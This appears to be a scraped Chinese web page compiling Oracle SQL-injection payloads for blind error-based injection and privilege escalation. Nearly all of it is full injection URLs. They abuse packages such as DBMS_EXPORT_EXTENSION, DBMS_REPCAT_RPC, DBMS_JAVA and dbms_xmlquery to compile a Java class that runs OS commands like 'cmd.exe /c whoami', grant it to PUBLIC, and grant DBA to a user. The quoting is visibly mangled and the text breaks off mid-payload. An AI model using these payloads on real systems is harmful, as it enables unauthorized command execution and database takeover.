and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT].PUT(:P1);EXECUTE IMMEDIATE]DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ]]begin dbms_java.grant_permission(]]]PUBLIC]]]], ]]]]SYS:java.io.FilePermission]]]],]]]]<>]]]], ]]]]execute]]]]);end;]];END;];END;–’,'SYS’,0,’1′,0) from dual) is not null- Create$Functio http://ooo/1. jsp ?1=String'’ and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT] .PUT(:P1);EXECUTE IMMEDIATE ]DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ]]create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ]]]]LinxUtil.runCMD(java.lang.String) return String]]]]; ]];END;];END;–’,'SYS’,0,’1′,0) from dual) is not null- Grant$function$execute$Privilege http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT].PUT(:P1);EXECUTE IMMEDIATE ]DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ]]grant all on LinxRunCMD to public]];END;];END;–’,'SYS’,0,’1′,0) from dual) is not null – Execute$OS$Code http://ooo/1.jsp?1=String'’ and (select sys.LinxRunCMD(‘cmd.exe /c whoami’) from dual) is not null- 使用java的权限 影响系统:10g R2, 11g R1 and 11g R2 a) DBMS_JAVA.RUNJAV 影响系统:11gR1,11gR2 http://ooo/1.jsp?1=String'’ and (SELECT DBMS_JAVA.RUNJAVA (‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>C:\\OUT.LST’) FROM DUAL) is not null – b) DBMS_JAVA_TEST.FUNCAL 影响系统:10g R2, 11g R1,11g R2 http://ooo/1.jsp?1=String'’ and (Select DBMS_JAVA_TEST.FUNCALL (‘oracle/aurora/util/Wrapper’,'main’,'c:\\windows\\system32\\cmd.exe’,'/c’,'dir>c:\\OUT2.LST’) FROM DUAL) is not null— DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC 影响系统: Oracle 8, 9,10g R1, 10g R2, 11g R1 - 1. Create Library http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ]DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ]]create or replace and compile java source named [LinxUtil] as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=]";while ((stemp = myReader.readLine()) != null) str+=stemp+]\n];myReader.close();return str;} catch (Exception e){returne.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=]";while ((stemp = myReader.readLine()) != null) str +=stemp+]\n];myReader.close();return str;} catch (Exception e){return e.toString();}}}]];END;];END;–‘,’CCCCC’) from dual) is not null- 2. Granting JAVA permissions http://www.2cto.com /1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ]DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ]]create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ]]]]LinxUtil.runCMD(java.lang.String) return String]]]];]];END;];END;–’,'CCCCC’) from dual) is not null – 3. Making function executable by PUBLIC http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ]DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGINEXECUTE IMMEDIATE ]]grant all on LinxRunCMD to public]];END;];END;–‘,’CCCCC’) from dual) is not null – 4. Executing OS Code http://ooo/1.jsp?1=String'’ and (select sys.LinxRunCMD(‘cmd.exe /c whoami ‘) from dual) is not null – 打补丁后的:需要CREATE PROCEDURE权限 1.Create Function http://www.2cto.com /default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ]create or replace function pwn2 return varchar2 authid current_user is PRAGMA autonomous_transaction;BEGIN execute immediate ]]grant dba to scott]];commit;return ]]z]];END; ]; commit; end;’) from dual) is not null – 2. Exploiting SYS.L http://ooo/default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ] begin SYS.LT.CREATEWORKSPACE(]]A10]]]] and scott.pwn2()=]]]]x]]); YS.LT.REMOVEWORKSPACE(]]A10]]]] and scott.pwn2()=]]]]x]]);end;]; commit; end;’) from dual) is not null – Let’s look at CPU of October 2010 (vulnerable versions 10gR1, 10gR2, 11g R1 and 11gR2) and look at the vulnerability in package sys.dbms_cdc_publish.create_change_set which allows a user with EXECUTE_CATALOG_ROLE privilege to become DBA. http://ooo/default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMAAUTONOMOUS_TRANSACTION
查看更多关于oracle盲注报错语句和oracle提权语句汇总 - 网站安的详细内容...